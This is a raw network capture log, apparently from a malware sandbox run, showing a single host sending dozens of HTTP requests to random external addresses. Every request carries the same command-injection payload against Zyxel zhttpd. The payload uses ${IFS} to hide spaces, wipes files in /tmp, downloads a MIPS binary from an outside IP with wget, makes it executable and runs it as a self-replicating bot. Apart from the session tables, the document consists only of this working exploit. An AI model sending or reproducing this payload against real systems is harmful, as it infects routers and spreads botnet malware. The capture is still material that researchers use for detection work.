                                      Jan 19, 2024 17:29:40.939827919 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      6391192.168.2.1435528134.152.135.28443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:40.939861059 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      6392192.168.2.144912674.61.253.64443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:40.939892054 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      6393192.168.2.1446916219.58.1.22443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:40.939934969 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      6394192.168.2.1445972164.207.157.159443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:40.939982891 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      6395192.168.2.1433110194.74.8.39443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:40.940031052 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      6396192.168.2.145665231.207.77.191443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:40.940063953 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      6397192.168.2.1452984106.190.8.165443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:40.940085888 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      6398192.168.2.1453530116.150.242.225443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:40.940149069 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      6399192.168.2.1442570158.241.138.92443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:40.940179110 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      6400192.168.2.145856486.255.9.130443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:40.940218925 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      6401192.168.2.143356492.234.4.225443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:40.940294981 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      6402192.168.2.1437622132.226.129.84443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:40.940313101 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      6403192.168.2.14559909.8.233.217443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:40.940351963 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      6404192.168.2.143582492.26.252.200443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:40.940401077 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      6405192.168.2.1450732141.122.129.218443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:40.940458059 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      6406192.168.2.1441700160.39.83.45443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:40.940494061 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      6407192.168.2.143382864.99.14.240443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:40.940512896 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      6408192.168.2.144361089.52.252.140443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:40.940579891 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      6409192.168.2.1444998219.144.137.44443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:40.940604925 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      6410192.168.2.1447238108.227.84.200443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:40.940649033 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      6411192.168.2.144708098.42.205.227443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:40.940682888 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      6412192.168.2.1460612185.140.232.255443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:40.940735102 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      6413192.168.2.143637466.185.123.249443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:40.940762043 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      6414192.168.2.1434206104.156.88.107443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:40.940823078 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      6415192.168.2.1439826184.84.146.200443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:40.940871954 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      6416192.168.2.1458018223.109.52.161443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:40.940877914 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      6417192.168.2.1459380212.227.196.34443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:40.940932035 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      6418192.168.2.1452492197.241.6.87443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:40.940967083 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      6419192.168.2.1452004135.240.247.18443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:40.941014051 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      6420192.168.2.143835665.137.254.165443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:40.941057920 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      6421192.168.2.1455066217.211.69.127443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:40.941093922 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      6422192.168.2.1440854188.140.3.92443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:40.941133022 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      6423192.168.2.143424490.30.82.15443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:40.941179991 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      6424192.168.2.1441104171.84.40.7443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:40.941217899 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      6425192.168.2.143682834.63.117.37443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:40.941263914 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      6426192.168.2.145669886.37.194.65443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:40.941286087 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      6427192.168.2.1459758157.181.96.103443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:40.941317081 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      6428192.168.2.144481482.234.61.70443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:40.941389084 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      6429192.168.2.1454584171.105.165.246443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:40.941402912 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      6430192.168.2.143358217.194.50.228443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:40.941450119 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      6431192.168.2.143995659.87.218.63443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:40.941492081 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      6432192.168.2.144293280.98.62.19443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:40.941521883 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      6433192.168.2.145692243.220.199.52443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:40.941560984 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      6434192.168.2.1432898190.154.140.159443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:40.941613913 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      6435192.168.2.1435868134.124.54.148443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:40.941643000 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      6436192.168.2.1448214152.242.125.108443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:40.941704035 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      6437192.168.2.143328247.247.108.215443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:40.941749096 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      6438192.168.2.1450146216.194.173.204443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:40.941751003 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      6439192.168.2.145780453.33.123.92443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:40.941804886 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      6440192.168.2.14576061.87.130.133443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:40.941816092 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      6441192.168.2.144037077.200.36.86443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:40.941871881 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      6442192.168.2.1453454132.67.244.234443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:40.941909075 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      6443192.168.2.1460750123.122.155.150443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:40.941961050 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      6444192.168.2.1455878176.79.89.38443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:40.941978931 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      6445192.168.2.143740054.160.255.67443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:40.942038059 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      6446192.168.2.145191466.122.35.218443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:40.942073107 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      6447192.168.2.1444914179.167.181.159443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:40.942104101 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      6448192.168.2.1436244164.249.239.253443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:40.942152023 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      6449192.168.2.1451818190.166.52.19443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:40.942187071 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      6450192.168.2.1445088175.144.77.116443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:40.942208052 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      6451192.168.2.1440020191.207.142.120443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:40.942243099 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      6452192.168.2.1452770177.239.230.25443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:40.942291021 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      6453192.168.2.145033873.104.135.199443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:40.942316055 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      6454192.168.2.1451500157.98.223.69443
                                      TimestampBytes transferredDirectionData
